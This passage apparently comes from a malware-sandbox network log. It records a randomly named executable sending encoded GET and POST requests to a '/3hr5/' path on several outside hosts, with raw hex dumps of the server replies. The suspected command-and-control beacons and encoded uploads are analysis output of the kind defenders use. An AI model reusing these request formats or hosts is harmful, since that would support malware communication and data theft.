                                                                                                                              Data Ascii: JK/qHv5kuXqozE+rd/j4fWVgwmOeyWPi1Njt8bAzCfxYbSsvxLfHpOz1WpVCh8gwfFPjgMJ2lKba4wsaIRImocVvHtcrmnsIHPuk/XJxv0754086EFqSfjPdCTH1G+8gcEgC1hYUxStvkAZIKpAh5LrLFfmq8Hel9x9gz9LNorzN9ixDhVmic0VvVBBSxXs6seNNaev5DrAP/ysxo+xNKvYtd14XxXiC+FWH8omI9kZwW+eI1Uw
                                                                                                                              Dec 4, 2023 15:26:55.721024036 CET242INHTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                                                                                                                              Dec 4, 2023 15:26:55.721137047 CET2626OUTData Raw: 36 64 70 6f 43 65 68 34 57 33 31 65 66 32 73 36 41 4d 72 66 39 56 56 4e 77 75 65 56 58 49 4b 44 58 41 64 30 76 36 69 4c 39 62 35 5a 67 4f 4a 4a 67 74 44 5a 4d 72 73 71 44 79 34 4f 61 65 76 4a 73 75 4d 69 4d 62 36 4d 33 67 71 63 6f 58 4e 53 4f 66
                                                                                                                              Data Ascii: 6dpoCeh4W31ef2s6AMrf9VVNwueVXIKDXAd0v6iL9b5ZgOJJgtDZMrsqDy4OaevJsuMiMb6M3gqcoXNSOfbiON5rn5kBzUlXFk3yu9n2iMGQp2yF1++9EKlaGlt2hgbUznc8hH0dm+BOEUUmSwiMk74+032nxvPpwJA2sxU5CHzqF0paVozBAxSov8TkneTAiGyDoSVpGvPaC9Iir0Mypz5LvrRJiktxOCrwT8+biukrAZ/73En
                                                                                                                              Dec 4, 2023 15:26:55.721295118 CET1340OUTData Raw: 6f 53 6e 38 44 36 36 34 53 38 50 35 33 66 33 6a 53 2f 58 2b 65 46 6c 54 53 64 54 48 51 66 67 76 6e 39 49 49 49 42 4b 47 2f 67 4a 42 74 5a 53 44 79 39 31 2f 4e 69 48 76 63 66 53 70 61 48 4a 68 44 72 51 41 35 45 79 35 39 72 62 63 32 6c 50 30 52 35
                                                                                                                              Data Ascii: oSn8D664S8P53f3jS/X+eFlTSdTHQfgvn9IIIBKG/gJBtZSDy91/NiHvcfSpaHJhDrQA5Ey59rbc2lP0R5Zn0URvZb1HcJ/AGjR4wK1q7gL4s1C9qKkabArdkT9UYf8QirW9XQT+AsLqylkO2Jfi3b2dJ9n6TS4dSJu2Ctd/GXBCc9zJZtAB5QQvffitrEsH0Oen7W3CLg3Iq+uC0Y8ZsFg+/DikHv4ty6ZRbvtGFRQIGCp+6Zh
                                                                                                                              Dec 4, 2023 15:26:55.721467018 CET1340OUTData Raw: 2b 56 30 32 56 77 77 7a 71 34 69 41 33 79 38 34 78 7a 76 2b 71 78 39 54 57 50 74 6b 6c 67 65 66 57 47 57 62 6b 54 4f 4f 6b 70 69 48 79 36 4e 41 68 70 39 4a 36 6c 43 45 6e 76 48 32 78 61 2f 34 4a 67 6d 5a 4a 6b 4a 5a 47 53 38 50 45 4f 64 42 69 4e
                                                                                                                              Data Ascii: +V02Vwwzq4iA3y84xzv+qx9TWPtklgefWGWbkTOOkpiHy6NAhp9J6lCEnvH2xa/4JgmZJkJZGS8PEOdBiNFcY//C2v1w4urDr0r/jOOf0AnfkGkU/87eILl4RAj8lR3/h6QXgOjkAzdpiqpNc24iIViBM9x6bBallJdvlx8nlLPBFGIbiMyg5w8Ede87lKDkDFSGfROB0mw3yDzVDbvKu1BWlxRcyEqtofQi3KTfbraxUBfCZ78


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              65192.168.11.205019637.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:58.246385098 CET528OUTGET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:58.425792933 CET1340INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                                                              Server: Apache
                                                                                                                              Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              X-Varnish: 1067625590 3
                                                                                                                              Age: 19015217
                                                                                                                              Via: 1.1 varnish (Varnish/6.1)
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 64668
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                                                              Dec 4, 2023 15:26:58.425908089 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c
                                                                                                                              Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space
                                                                                                                              Dec 4, 2023 15:26:58.425975084 CET1340INData Raw: 63 2d 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e
                                                                                                                              Data Ascii: c-2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                                                              Dec 4, 2023 15:26:58.426069021 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                                                              Dec 4, 2023 15:26:58.426162958 CET1340INData Raw: 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20
                                                                                                                              Data Ascii: erved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <
                                                                                                                              Dec 4, 2023 15:26:58.426291943 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c
                                                                                                                              Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo
                                                                                                                              Dec 4, 2023 15:26:58.426373005 CET1340INData Raw: 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                                                              Dec 4, 2023 15:26:58.426434040 CET1340INData Raw: 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: a href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width=
                                                                                                                              Dec 4, 2023 15:26:58.426517963 CET1340INData Raw: 30 31 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e
                                                                                                                              Data Ascii: 01h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g
                                                                                                                              Dec 4, 2023 15:26:58.426577091 CET1340INData Raw: 37 2c 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: 7,25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-
                                                                                                                              Dec 4, 2023 15:26:58.604487896 CET1340INData Raw: 20 20 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c
                                                                                                                              Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              66192.168.11.2050197108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:27:03.918009043 CET831OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 45 5a 76 46 43 6a 70 56 61 78 45 7a 63 72 67 6d 47 46 69 6d 4f 54 4e 55 69 35 57 6f 54 57 39 52 48 44 35 44 44 41 50 61 79 4e 6c 4f 61 6b 6d 57 39 66 4e 4f 73 58 69 65 62 6e 44 36 64 68 66 45 53 75 33 41 34 6b 45 50 31 73 52 49 73 68 78 42 44 63 72 57 78 4e 36 52 4b 2f 44 6f 54 79 34 32 48 48 54 68 39 66 79 73 37 2f 66 6b 7a 32 51 41 61 71 4c 32 53 44 74 4d 37 4f 74 57 37 4f 35 6d 61 72 56 59 52 30 50 6f 35 5a 6b 36 72 75 54 7a 66 59 6f 47 6c 57 5a 74 68 68 56 45 31 47 52 59 36 4e 2b 64 4a 77 78 5a 32 4a 35 56 64 6b 33 2b 7a 77 3d 3d
                                                                                                                              Data Ascii: TZd=EZvFCjpVaxEzcrgmGFimOTNUi5WoTW9RHD5DDAPayNlOakmW9fNOsXiebnD6dhfESu3A4kEP1sRIshxBDcrWxN6RK/DoTy42HHTh9fys7/fkz2QAaqL2SDtM7OtW7O5marVYR0Po5Zk6ruTzfYoGlWZthhVE1GRY6N+dJwxZ2J5Vdk3+zw==
                                                                                                                              Dec 4, 2023 15:27:04.168114901 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:27:03 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f 5e 3c df 67 d6 c5 ef 49 37 c0 ef a8 3f d8 39 b7 77 ce bd 9d 33
                                                                                                                              Data Ascii: RrG}} A,o1Z9$9r0"U}mV7n$-Js9{,s !d;G20D)U`sC")f,0]Q"8+9e*\|?*SUa0>[ZaxJ|$o@O?DUJN],;S1p8&LDqE1f%l,/dWPn@jpb9g5L_i"dbSELE^({!OO<PX}bRAo]:R,7Gs&b9.9dcH4kgB53Z|?[}\G,]/?Nz/^,~XXvUC<,TAe^<wx[K]b81]3PB92M_Z& @!xLO-7XK4gT-8]IQuRHReK|0'c7FT4ql{8(Ml$Qjnn6y1,5"U4V;3aIX&pj704O,_0_xrD1-5n<(9S(AhecWyzx~54kY1;BG9SNg*mE<D=v>Sv*LJk|nO?UMv/^<gI7?9w3
                                                                                                                              Dec 4, 2023 15:27:04.168199062 CET1340INData Raw: d4 e7 0f f6 26 e9 6e e0 77 92 f7 22 ed 3b 91 de 9d 08 3c dc 07 a1 9b a7 e5 0a 20 93 97 6c bd 83 9d 49 2d 67 98 86 3b f4 26 eb 4d 6c 5e db 3b af 9b 59 0e 15 4e 0e 16 36 6f 56 e8 e1 d6 31 d3 b5 63 66 54 11 35 76 0a 81 65 4c 40 ec 3c 1f 9b 65 0e 72
                                                                                                                              Data Ascii: &nw";< lI-g;&Ml^;YN6oV1cfT5veL@<erJ!rBH>%LhCETRNuN^1kp2iXyWRXC;vZs;~/0/GfKyC9;FNzS; v Urlt< )5Z44hP
                                                                                                                              Dec 4, 2023 15:27:04.168237925 CET1340INData Raw: 45 93 94 a1 d0 eb 74 3a 9b d8 e9 54 0a e3 6a f6 07 8c 42 2f 6c f7 20 bb d9 b2 b6 93 5d 5c 54 dc af 77 d6 bf 26 b9 33 48 1d 95 dd cd 6f 95 4d b8 9c a0 d3 ea 24 9d c8 78 79 ed ba 88 ef e6 0a 34 18 b7 52 c5 45 3e 88 3e 22 df 04 e5 e7 b4 36 27 5a 52
                                                                                                                              Data Ascii: Et:TjB/l ]\Tw&3HoM$xy4RE>>"6'ZR(t:N}<e0gZ~srqg6o0>of,vM<^eW(H*CclD%,Ij JU0}0I> {DYm!}wIsz2?#6fZME#b
                                                                                                                              Dec 4, 2023 15:27:04.168275118 CET1340INData Raw: 0f dc 03 50 76 a8 e9 bc 9e 83 e9 14 57 40 97 4f 02 d9 6f 56 83 37 4f 99 81 27 81 94 1d 0e 79 24 67 e2 69 3a 6d ba 1c dc ab 82 f8 49 08 9b 2e 35 08 bc c8 98 90 c5 1a 4a 2a 2a 92 a7 a9 55 db f1 61 64 9a 4d 40 7d 49 e0 b2 61 1d 2e 4b 52 83 66 01 10
                                                                                                                              Data Ascii: PvW@OoV7O'y$gi:mI.5J**UadM@}Ia.KRf+<s~!f\Yil_lAP9PUVDjsqYYq=)..?~y|Vr&>OMm*?3/2&dT0"&X4Xsqr
                                                                                                                              Dec 4, 2023 15:27:04.168311119 CET1340INData Raw: 43 bb b6 c8 84 cb e8 ea 02 ed 8e 34 d6 4d d7 9d 6c 57 96 d1 04 d6 dd 6e f1 39 25 98 6c 30 8a 6c 2d 62 ae b0 e3 05 8e 9c ca d8 85 85 01 85 98 2d 92 48 99 70 b8 98 e2 d0 2e 08 3a e1 10 b7 88 bd 5d c4 4c e7 9c 2e 5d 3d a7 b9 73 7e f4 ec d9 b3 5d c1
                                                                                                                              Data Ascii: C4MlWn9%l0l-b-Hp.:]L.]=s~]L-*}k7_v0vC?R2!vmr8Dzj_:<i/*oE_0XEe,*~`~vbS1Nd$GPJn%mu#Vhp7)-\
                                                                                                                              Dec 4, 2023 15:27:04.168340921 CET530INData Raw: 18 b4 36 65 22 b1 41 aa 14 24 54 c4 d2 f3 3c e7 a6 55 8e 74 81 53 08 cd a9 81 0b 83 23 d9 e6 0a 7e 2f 70 9d f1 2a e0 7c 2c 82 00 4e 48 91 91 88 66 b9 24 72 82 56 a0 c6 86 a7 1d c5 a4 e5 25 66 28 c0 a6 e2 47 31 2b 8b 42 8c d9 e7 09 e3 1c 39 ac 9f
                                                                                                                              Data Ascii: 6e"A$T<UtS#~/p*|,NHf$rV%f(G1+B9P>k1+{Nl_DkyNAe*0l\ mfPxYPmC8D%F38M{[HCcR%aAB:SZpsq+V1(3t*'/*S{;U^)


